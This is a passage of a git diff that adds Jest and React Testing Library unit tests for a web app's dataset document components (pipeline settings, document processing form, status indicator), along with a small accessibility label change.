expect(mockInvalidDocumentDetail).toHaveBeenCalled() + }) + }) + }) + + // ==================== User Interactions - Preview ==================== + describe('User Interactions - Preview', () => { + it('should trigger preview when preview button is clicked', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({ data: { outputs: {} } }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalled() + }) + }) + + it('should call handlePreviewChunks with is_preview=true', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({ data: { outputs: {} } }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith( + expect.objectContaining({ + is_preview: true, + pipeline_id: mockPipelineId, + }), + expect.any(Object), + ) + }) + }) + + it('should update estimateData on successful preview', async () => { + // Arrange + const mockOutputs = { chunks: [], total_tokens: 50 } + mockMutateAsync.mockImplementation((_req, opts) => { + opts?.onSuccess?.({ data: { outputs: mockOutputs } }) + return Promise.resolve({ data: { outputs: mockOutputs } }) + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + await waitFor(() => { + expect(screen.getByTestId('has-estimate-data')).toHaveTextContent('true') + }) + }) + }) + + // ==================== API Integration ==================== + describe('API Integration', () => { + it('should pass correct parameters for preview', async () => { + // Arrange + const mockData = createMockExecutionLogResponse({ + datasource_type: DatasourceType.localFile, + datasource_node_id: 'node-xyz', + datasource_info: { related_id: 'file-1', name: 'test.pdf', extension: 'pdf' }, + input_data: {}, + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + mockMutateAsync.mockResolvedValue({ data: { outputs: {} } }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert - inputs come from initialData which is transformed by useInitialData + // Since usePublishedPipelineProcessingParams returns empty variables, inputs is {} + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith( + { + pipeline_id: mockPipelineId, + inputs: {}, + start_node_id: 'node-xyz', + datasource_type: DatasourceType.localFile, + datasource_info_list: [{ related_id: 'file-1', name: 'test.pdf', extension: 'pdf' }], + is_preview: true, + }, + expect.any(Object), + ) + }) + }) + }) + + // ==================== Edge Cases ==================== + describe('Edge Cases', () => { + it.each([ + [DatasourceType.localFile, 'local-files-count', '1'], + [DatasourceType.websiteCrawl, 'website-pages-count', '1'], + [DatasourceType.onlineDocument, 'online-documents-count', '1'], + [DatasourceType.onlineDrive, 'online-drive-files-count', '1'], + ])('should handle %s datasource type correctly', (datasourceType, testId, expectedCount) => { + // Arrange + const datasourceInfoMap: Record> = { + [DatasourceType.localFile]: { related_id: 'f1', name: 'file.pdf', extension: 'pdf' }, + [DatasourceType.websiteCrawl]: { content: 'c', description: 'd', source_url: 'u', title: 't' }, + [DatasourceType.onlineDocument]: { workspace_id: 'w1', page: { page_id: 'p1' } }, + [DatasourceType.onlineDrive]: { id: 'd1', type: 'doc', name: 'n', size: 100 }, + } + + const mockData = createMockExecutionLogResponse({ + datasource_type: datasourceType, + datasource_info: datasourceInfoMap[datasourceType], + }) + mockUsePipelineExecutionLog.mockReturnValue({ + data: mockData, + isFetching: false, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId(testId)).toHaveTextContent(expectedCount) + }) + + it('should show loading state during initial fetch', () => { + // Arrange + mockUsePipelineExecutionLog.mockReturnValue({ + data: undefined, + isFetching: true, + isError: false, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.queryByTestId('process-form')).not.toBeInTheDocument() + }) + + it('should show error state when API fails', () => { + // Arrange + mockUsePipelineExecutionLog.mockReturnValue({ + data: undefined, + isFetching: false, + isError: true, + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.queryByTestId('process-form')).not.toBeInTheDocument() + }) + }) + + // ==================== State Management ==================== + describe('State Management', () => { + it('should initialize with undefined estimateData', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('has-estimate-data')).toHaveTextContent('false') + }) + + it('should update estimateData after successful preview', async () => { + // Arrange + const mockEstimateData = { chunks: [], total_tokens: 50 } + mockMutateAsync.mockImplementation((_req, opts) => { + opts?.onSuccess?.({ data: { outputs: mockEstimateData } }) + return Promise.resolve({ data: { outputs: mockEstimateData } }) + }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + await waitFor(() => { + expect(screen.getByTestId('has-estimate-data')).toHaveTextContent('true') + }) + }) + + it('should set isPreview ref to false when process is clicked', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({}) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith( + expect.objectContaining({ is_preview: false }), + expect.any(Object), + ) + }) + }) + + it('should set isPreview ref to true when preview is clicked', async () => { + // Arrange + mockMutateAsync.mockResolvedValue({ data: { outputs: {} } }) + const props = createDefaultProps() + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith( + expect.objectContaining({ is_preview: true }), + expect.any(Object), + ) + }) + }) + + it('should pass isPending=true to ChunkPreview when preview is pending', async () => { + // Arrange - Start with isPending=false so buttons are enabled + let isPendingState = false + mockUseRunPublishedPipeline.mockImplementation(() => ({ + mutateAsync: mockMutateAsync, + isIdle: !isPendingState, + isPending: isPendingState, + })) + + // A promise that never resolves to keep the pending state + const pendingPromise = new Promise(() => undefined) + // When mutateAsync is called, set isPending to true and trigger rerender + mockMutateAsync.mockImplementation(() => { + isPendingState = true + return pendingPromise + }) + + const props = createDefaultProps() + const { rerender } = renderWithProviders() + + // Act - Click preview button (sets isPreview.current = true and calls mutateAsync) + fireEvent.click(screen.getByTestId('preview-btn')) + + // Update mock and rerender to reflect isPending=true state + mockUseRunPublishedPipeline.mockReturnValue({ + mutateAsync: mockMutateAsync, + isIdle: false, + isPending: true, + }) + rerender( + + + , + ) + + // Assert - isPending && isPreview.current should both be true now + expect(screen.getByTestId('is-pending')).toHaveTextContent('true') + }) + + it('should pass isPending=false to ChunkPreview when process is pending (not preview)', async () => { + // Arrange - isPending is true but isPreview.current is false + mockUseRunPublishedPipeline.mockReturnValue({ + mutateAsync: mockMutateAsync, + isIdle: false, + isPending: true, + }) + mockMutateAsync.mockReturnValue(new Promise(() => undefined)) + const props = createDefaultProps() + + // Act + renderWithProviders() + // Click process (not preview) to set isPreview.current = false + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert - isPending && isPreview.current should be false (true && false = false) + await waitFor(() => { + expect(screen.getByTestId('is-pending')).toHaveTextContent('false') + }) + }) + }) +}) diff --git a/web/app/components/datasets/documents/detail/settings/pipeline-settings/left-header.tsx b/web/app/components/datasets/documents/detail/settings/pipeline-settings/left-header.tsx index a075aa3308..b5660259a8 100644 --- a/web/app/components/datasets/documents/detail/settings/pipeline-settings/left-header.tsx +++ b/web/app/components/datasets/documents/detail/settings/pipeline-settings/left-header.tsx @@ -31,6 +31,7 @@ const LeftHeader = ({ variant='secondary-accent' className='absolute -left-11 top-3.5 size-9 rounded-full p-0' onClick={navigateBack} + aria-label={t('common.operation.back')} > diff --git a/web/app/components/datasets/documents/detail/settings/pipeline-settings/process-documents/index.spec.tsx b/web/app/components/datasets/documents/detail/settings/pipeline-settings/process-documents/index.spec.tsx new file mode 100644 index 0000000000..aae59b30a9 --- /dev/null +++ b/web/app/components/datasets/documents/detail/settings/pipeline-settings/process-documents/index.spec.tsx @@ -0,0 +1,573 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' +import ProcessDocuments from './index' +import { PipelineInputVarType } from '@/models/pipeline' +import type { RAGPipelineVariable } from '@/models/pipeline' + +// Mock i18n +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Mock dataset detail context - required for useInputVariables hook +const mockPipelineId = 'pipeline-123' +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset: { pipeline_id: string } }) => string) => + selector({ dataset: { pipeline_id: mockPipelineId } }), +})) + +// Mock API call for pipeline processing params +const mockParamsConfig = jest.fn() +jest.mock('@/service/use-pipeline', () => ({ + usePublishedPipelineProcessingParams: () => ({ + data: mockParamsConfig(), + isFetching: false, + }), +})) + +// Mock Form component - internal dependencies (useAppForm, BaseField) are too complex +// Keep the mock minimal and focused on testing the integration +jest.mock('../../../../create-from-pipeline/process-documents/form', () => { + return function MockForm({ + ref, + initialData, + configurations, + onSubmit, + onPreview, + isRunning, + }: { + ref: React.RefObject<{ submit: () => void }> + initialData: Record + configurations: Array<{ variable: string; label: string; type: string }> + schema: unknown + onSubmit: (data: Record) => void + onPreview: () => void + isRunning: boolean + }) { + // Expose submit method via ref for parent component control + if (ref && typeof ref === 'object' && 'current' in ref) { + (ref as React.MutableRefObject<{ submit: () => void }>).current = { + submit: () => onSubmit(initialData), + } + } + return ( +
{ + e.preventDefault() + onSubmit(initialData) + }} + > + {/* Render actual field labels from configurations */} + {configurations.map((config, index) => ( +
+ + +
+ ))} + +
+ ) + } +}) + +// Test utilities +const createQueryClient = () => + new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, + }) + +const renderWithProviders = (ui: React.ReactElement) => { + const queryClient = createQueryClient() + return render( + + {ui} + , + ) +} + +// Factory function for creating mock variables - matches RAGPipelineVariable type +const createMockVariable = (overrides: Partial = {}): RAGPipelineVariable => ({ + belong_to_node_id: 'node-123', + type: PipelineInputVarType.textInput, + variable: 'test_var', + label: 'Test Variable', + required: false, + ...overrides, +}) + +// Default props factory +const createDefaultProps = (overrides: Partial<{ + datasourceNodeId: string + lastRunInputData: Record + isRunning: boolean + ref: React.RefObject<{ submit: () => void } | null> + onProcess: () => void + onPreview: () => void + onSubmit: (data: Record) => void +}> = {}) => ({ + datasourceNodeId: 'node-123', + lastRunInputData: {}, + isRunning: false, + ref: { current: null } as React.RefObject<{ submit: () => void } | null>, + onProcess: jest.fn(), + onPreview: jest.fn(), + onSubmit: jest.fn(), + ...overrides, +}) + +describe('ProcessDocuments', () => { + beforeEach(() => { + jest.clearAllMocks() + // Default: return empty variables + mockParamsConfig.mockReturnValue({ variables: [] }) + }) + + // ==================== Rendering Tests ==================== + // Test basic rendering and component structure + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - verify both Form and Actions are rendered + expect(screen.getByTestId('process-form')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })).toBeInTheDocument() + }) + + it('should render with correct container structure', () => { + // Arrange + const props = createDefaultProps() + + // Act + const { container } = renderWithProviders() + + // Assert + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'flex-col', 'gap-y-4', 'pt-4') + }) + + it('should render form fields based on variables configuration', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'chunk_size', label: 'Chunk Size', type: PipelineInputVarType.number }), + createMockVariable({ variable: 'separator', label: 'Separator', type: PipelineInputVarType.textInput }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - real hooks transform variables to configurations + expect(screen.getByTestId('field-chunk_size')).toBeInTheDocument() + expect(screen.getByTestId('field-separator')).toBeInTheDocument() + expect(screen.getByText('Chunk Size')).toBeInTheDocument() + expect(screen.getByText('Separator')).toBeInTheDocument() + }) + }) + + // ==================== Props Testing ==================== + // Test how component behaves with different prop values + describe('Props', () => { + describe('lastRunInputData', () => { + it('should use lastRunInputData as initial form values', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'chunk_size', label: 'Chunk Size', type: PipelineInputVarType.number, default_value: '100' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const lastRunInputData = { chunk_size: 500 } + const props = createDefaultProps({ lastRunInputData }) + + // Act + renderWithProviders() + + // Assert - lastRunInputData should override default_value + const input = screen.getByTestId('input-chunk_size') as HTMLInputElement + expect(input.defaultValue).toBe('500') + }) + + it('should use default_value when lastRunInputData is empty', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'chunk_size', label: 'Chunk Size', type: PipelineInputVarType.number, default_value: '100' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps({ lastRunInputData: {} }) + + // Act + renderWithProviders() + + // Assert + const input = screen.getByTestId('input-chunk_size') as HTMLInputElement + expect(input.value).toBe('100') + }) + }) + + describe('isRunning', () => { + it('should enable Actions button when isRunning is false', () => { + // Arrange + const props = createDefaultProps({ isRunning: false }) + + // Act + renderWithProviders() + + // Assert + const processButton = screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' }) + expect(processButton).not.toBeDisabled() + }) + + it('should disable Actions button when isRunning is true', () => { + // Arrange + const props = createDefaultProps({ isRunning: true }) + + // Act + renderWithProviders() + + // Assert + const processButton = screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' }) + expect(processButton).toBeDisabled() + }) + + it('should disable preview button when isRunning is true', () => { + // Arrange + const props = createDefaultProps({ isRunning: true }) + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('preview-btn')).toBeDisabled() + }) + }) + + describe('ref', () => { + it('should expose submit method via ref', () => { + // Arrange + const ref = { current: null } as React.RefObject<{ submit: () => void } | null> + const onSubmit = jest.fn() + const props = createDefaultProps({ ref, onSubmit }) + + // Act + renderWithProviders() + + // Assert + expect(ref.current).not.toBeNull() + expect(typeof ref.current?.submit).toBe('function') + + // Act - call submit via ref + ref.current?.submit() + + // Assert - onSubmit should be called + expect(onSubmit).toHaveBeenCalled() + }) + }) + }) + + // ==================== User Interactions ==================== + // Test event handlers and user interactions + describe('User Interactions', () => { + describe('onProcess', () => { + it('should call onProcess when Save and Process button is clicked', () => { + // Arrange + const onProcess = jest.fn() + const props = createDefaultProps({ onProcess }) + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + expect(onProcess).toHaveBeenCalledTimes(1) + }) + + it('should not call onProcess when button is disabled due to isRunning', () => { + // Arrange + const onProcess = jest.fn() + const props = createDefaultProps({ onProcess, isRunning: true }) + + // Act + renderWithProviders() + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert + expect(onProcess).not.toHaveBeenCalled() + }) + }) + + describe('onPreview', () => { + it('should call onPreview when preview button is clicked', () => { + // Arrange + const onPreview = jest.fn() + const props = createDefaultProps({ onPreview }) + + // Act + renderWithProviders() + fireEvent.click(screen.getByTestId('preview-btn')) + + // Assert + expect(onPreview).toHaveBeenCalledTimes(1) + }) + }) + + describe('onSubmit', () => { + it('should call onSubmit with form data when form is submitted', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'chunk_size', label: 'Chunk Size', type: PipelineInputVarType.number, default_value: '100' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const onSubmit = jest.fn() + const props = createDefaultProps({ onSubmit }) + + // Act + renderWithProviders() + fireEvent.submit(screen.getByTestId('process-form')) + + // Assert - should submit with initial data transformed by real hooks + // Note: default_value is string type, so the value remains as string + expect(onSubmit).toHaveBeenCalledWith({ chunk_size: '100' }) + }) + }) + }) + + // ==================== Data Transformation Tests ==================== + // Test real hooks transform data correctly + describe('Data Transformation', () => { + it('should transform text-input variable to string initial value', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'name', label: 'Name', type: PipelineInputVarType.textInput, default_value: 'default' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + const input = screen.getByTestId('input-name') as HTMLInputElement + expect(input.defaultValue).toBe('default') + }) + + it('should transform number variable to number initial value', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'count', label: 'Count', type: PipelineInputVarType.number, default_value: '42' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + const input = screen.getByTestId('input-count') as HTMLInputElement + expect(input.defaultValue).toBe('42') + }) + + it('should use empty string for text-input without default value', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'name', label: 'Name', type: PipelineInputVarType.textInput }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + const input = screen.getByTestId('input-name') as HTMLInputElement + expect(input.defaultValue).toBe('') + }) + + it('should prioritize lastRunInputData over default_value', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'size', label: 'Size', type: PipelineInputVarType.number, default_value: '100' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps({ lastRunInputData: { size: 999 } }) + + // Act + renderWithProviders() + + // Assert + const input = screen.getByTestId('input-size') as HTMLInputElement + expect(input.defaultValue).toBe('999') + }) + }) + + // ==================== Edge Cases ==================== + // Test boundary conditions and error handling + describe('Edge Cases', () => { + describe('Empty/Null data handling', () => { + it('should handle undefined paramsConfig.variables', () => { + // Arrange + mockParamsConfig.mockReturnValue({ variables: undefined }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - should render without fields + expect(screen.getByTestId('process-form')).toBeInTheDocument() + expect(screen.queryByTestId(/^field-/)).not.toBeInTheDocument() + }) + + it('should handle null paramsConfig', () => { + // Arrange + mockParamsConfig.mockReturnValue(null) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('process-form')).toBeInTheDocument() + }) + + it('should handle empty variables array', () => { + // Arrange + mockParamsConfig.mockReturnValue({ variables: [] }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('process-form')).toBeInTheDocument() + expect(screen.queryByTestId(/^field-/)).not.toBeInTheDocument() + }) + }) + + describe('Multiple variables', () => { + it('should handle multiple variables of different types', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'text_field', label: 'Text', type: PipelineInputVarType.textInput, default_value: 'hello' }), + createMockVariable({ variable: 'number_field', label: 'Number', type: PipelineInputVarType.number, default_value: '123' }), + createMockVariable({ variable: 'select_field', label: 'Select', type: PipelineInputVarType.select, default_value: 'option1' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - all fields should be rendered + expect(screen.getByTestId('field-text_field')).toBeInTheDocument() + expect(screen.getByTestId('field-number_field')).toBeInTheDocument() + expect(screen.getByTestId('field-select_field')).toBeInTheDocument() + }) + + it('should submit all variables data correctly', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'field1', label: 'Field 1', type: PipelineInputVarType.textInput, default_value: 'value1' }), + createMockVariable({ variable: 'field2', label: 'Field 2', type: PipelineInputVarType.number, default_value: '42' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const onSubmit = jest.fn() + const props = createDefaultProps({ onSubmit }) + + // Act + renderWithProviders() + fireEvent.submit(screen.getByTestId('process-form')) + + // Assert - default_value is string type, so values remain as strings + expect(onSubmit).toHaveBeenCalledWith({ + field1: 'value1', + field2: '42', + }) + }) + }) + + describe('Variable with options (select type)', () => { + it('should handle select variable with options', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ + variable: 'mode', + label: 'Mode', + type: PipelineInputVarType.select, + options: ['auto', 'manual', 'custom'], + default_value: 'auto', + }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert + expect(screen.getByTestId('field-mode')).toBeInTheDocument() + const input = screen.getByTestId('input-mode') as HTMLInputElement + expect(input.defaultValue).toBe('auto') + }) + }) + }) + + // ==================== Integration Tests ==================== + // Test Form and Actions components work together with real hooks + describe('Integration', () => { + it('should coordinate form submission flow correctly', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'setting', label: 'Setting', type: PipelineInputVarType.textInput, default_value: 'initial' }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const onProcess = jest.fn() + const onSubmit = jest.fn() + const props = createDefaultProps({ onProcess, onSubmit }) + + // Act + renderWithProviders() + + // Assert - form is rendered with correct initial data + const input = screen.getByTestId('input-setting') as HTMLInputElement + expect(input.defaultValue).toBe('initial') + + // Act - click process button + fireEvent.click(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })) + + // Assert - onProcess is called + expect(onProcess).toHaveBeenCalled() + }) + + it('should render complete UI with all interactive elements', () => { + // Arrange + const variables: RAGPipelineVariable[] = [ + createMockVariable({ variable: 'test', label: 'Test Field', type: PipelineInputVarType.textInput }), + ] + mockParamsConfig.mockReturnValue({ variables }) + const props = createDefaultProps() + + // Act + renderWithProviders() + + // Assert - all UI elements are present + expect(screen.getByTestId('process-form')).toBeInTheDocument() + expect(screen.getByText('Test Field')).toBeInTheDocument() + expect(screen.getByTestId('preview-btn')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'datasetPipeline.operations.saveAndProcess' })).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/datasets/documents/status-item/index.spec.tsx b/web/app/components/datasets/documents/status-item/index.spec.tsx new file mode 100644 index 0000000000..b057af9102 --- /dev/null +++ b/web/app/components/datasets/documents/status-item/index.spec.tsx @@ -0,0 +1,968 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' +import StatusItem from './index' +import type { DocumentDisplayStatus } from '@/models/datasets' + +// Mock i18n - required for translation +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Mock ToastContext - required to verify notifications +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => ({ + ...jest.requireActual('use-context-selector'), + useContext: () => ({ notify: mockNotify }), +})) + +// Mock document service hooks - required to avoid real API calls +const mockEnableDocument = jest.fn() +const mockDisableDocument = jest.fn() +const mockDeleteDocument = jest.fn() + +jest.mock('@/service/knowledge/use-document', () => ({ + useDocumentEnable: () => ({ mutateAsync: mockEnableDocument }), + useDocumentDisable: () => ({ mutateAsync: mockDisableDocument }), + useDocumentDelete: () => ({ mutateAsync: mockDeleteDocument }), +})) + +// Mock useDebounceFn to execute immediately for testing +jest.mock('ahooks', () => ({ + ...jest.requireActual('ahooks'), + useDebounceFn: (fn: (...args: unknown[]) => void) => ({ run: fn }), +})) + +// Test utilities +const createQueryClient = () => + new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, + }) + +const renderWithProviders = (ui: React.ReactElement) => { + const queryClient = createQueryClient() + return render( + + {ui} + , + ) +} + +// Factory functions for test data +const createDetailProps = (overrides: Partial<{ + enabled: boolean + archived: boolean + id: string +}> = {}) => ({ + enabled: false, + archived: false, + id: 'doc-123', + ...overrides, +}) + +describe('StatusItem', () => { + beforeEach(() => { + jest.clearAllMocks() + mockEnableDocument.mockResolvedValue({ result: 'success' }) + mockDisableDocument.mockResolvedValue({ result: 'success' }) + mockDeleteDocument.mockResolvedValue({ result: 'success' }) + }) + + // ==================== Rendering Tests ==================== + // Test basic rendering with different status values + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderWithProviders() + + // Assert - check indicator element exists (real Indicator component) + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toBeInTheDocument() + }) + + it.each([ + ['queuing', 'bg-components-badge-status-light-warning-bg'], + ['indexing', 'bg-components-badge-status-light-normal-bg'], + ['paused', 'bg-components-badge-status-light-warning-bg'], + ['error', 'bg-components-badge-status-light-error-bg'], + ['available', 'bg-components-badge-status-light-success-bg'], + ['enabled', 'bg-components-badge-status-light-success-bg'], + ['disabled', 'bg-components-badge-status-light-disabled-bg'], + ['archived', 'bg-components-badge-status-light-disabled-bg'], + ] as const)('should render status "%s" with correct indicator background', (status, expectedBg) => { + // Arrange & Act + renderWithProviders() + + // Assert + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass(expectedBg) + }) + + it('should render status text from translation', () => { + // Arrange & Act + renderWithProviders() + + // Assert + expect(screen.getByText('datasetDocuments.list.status.available')).toBeInTheDocument() + }) + + it('should handle case-insensitive status', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass('bg-components-badge-status-light-success-bg') + }) + }) + + // ==================== Props Testing ==================== + // Test all prop variations and combinations + describe('Props', () => { + // reverse prop tests + describe('reverse prop', () => { + it('should apply default layout when reverse is false', () => { + // Arrange & Act + const { container } = renderWithProviders() + + // Assert + const wrapper = container.firstChild as HTMLElement + expect(wrapper).not.toHaveClass('flex-row-reverse') + }) + + it('should apply reversed layout when reverse is true', () => { + // Arrange & Act + const { container } = renderWithProviders() + + // Assert + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex-row-reverse') + }) + + it('should apply ml-2 to indicator when reversed', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass('ml-2') + }) + + it('should apply mr-2 to indicator when not reversed', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass('mr-2') + }) + }) + + // scene prop tests + describe('scene prop', () => { + it('should not render switch in list scene', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - Switch renders as a button element + expect(screen.queryByRole('switch')).not.toBeInTheDocument() + }) + + it('should render switch in detail scene', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + expect(screen.getByRole('switch')).toBeInTheDocument() + }) + + it('should default to list scene', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + expect(screen.queryByRole('switch')).not.toBeInTheDocument() + }) + }) + + // textCls prop tests + describe('textCls prop', () => { + it('should apply custom text class', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.available') + expect(statusText).toHaveClass('custom-text-class') + }) + + it('should default to empty string', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.available') + expect(statusText).toHaveClass('text-sm') + }) + }) + + // errorMessage prop tests + describe('errorMessage prop', () => { + it('should render tooltip trigger when errorMessage is provided', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - tooltip trigger element should exist + const tooltipTrigger = screen.getByTestId('error-tooltip-trigger') + expect(tooltipTrigger).toBeInTheDocument() + }) + + it('should show error message on hover', async () => { + // Arrange + renderWithProviders( + , + ) + + // Act - hover the tooltip trigger + const tooltipTrigger = screen.getByTestId('error-tooltip-trigger') + fireEvent.mouseEnter(tooltipTrigger) + + // Assert - wait for tooltip content to appear + expect(await screen.findByText('Something went wrong')).toBeInTheDocument() + }) + + it('should not render tooltip trigger when errorMessage is not provided', () => { + // Arrange & Act + renderWithProviders() + + // Assert - tooltip trigger should not exist + const tooltipTrigger = screen.queryByTestId('error-tooltip-trigger') + expect(tooltipTrigger).not.toBeInTheDocument() + }) + + it('should not render tooltip trigger when errorMessage is empty', () => { + // Arrange & Act + renderWithProviders() + + // Assert - tooltip trigger should not exist + const tooltipTrigger = screen.queryByTestId('error-tooltip-trigger') + expect(tooltipTrigger).not.toBeInTheDocument() + }) + }) + + // detail prop tests + describe('detail prop', () => { + it('should use default values when detail is undefined', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - switch should be unchecked (defaultValue = false when archived = false and enabled = false) + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'false') + }) + + it('should use enabled value from detail', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'true') + }) + + it('should set switch to false when archived regardless of enabled', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - archived overrides enabled, defaultValue becomes false + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'false') + }) + }) + }) + + // ==================== Memoization Tests ==================== + // Test useMemo logic for embedding status (disables switch) + describe('Memoization', () => { + it.each([ + ['queuing', true], + ['indexing', true], + ['paused', true], + ['available', false], + ['enabled', false], + ['disabled', false], + ['archived', false], + ['error', false], + ] as const)('should correctly identify embedding status for "%s" - disabled: %s', (status, isEmbedding) => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - check if switch is visually disabled (via CSS classes) + // The Switch component uses CSS classes for disabled state, not the native disabled attribute + const switchEl = screen.getByRole('switch') + if (isEmbedding) + expect(switchEl).toHaveClass('!cursor-not-allowed', '!opacity-50') + else + expect(switchEl).not.toHaveClass('!cursor-not-allowed') + }) + + it('should disable switch when archived', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - visually disabled via CSS classes + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveClass('!cursor-not-allowed', '!opacity-50') + }) + + it('should disable switch when both embedding and archived', () => { + // 